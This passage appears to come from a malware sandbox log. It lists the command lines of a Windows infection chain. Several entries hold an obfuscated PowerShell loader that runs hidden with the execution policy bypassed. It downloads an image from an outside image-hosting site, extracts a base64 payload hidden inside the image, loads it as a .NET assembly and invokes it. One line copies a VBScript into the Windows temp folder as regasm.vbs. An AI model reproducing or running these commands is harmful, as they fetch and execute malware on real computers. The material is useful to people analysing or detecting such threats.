ceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | powershell.exe -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force } |
cmdline | powershell -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 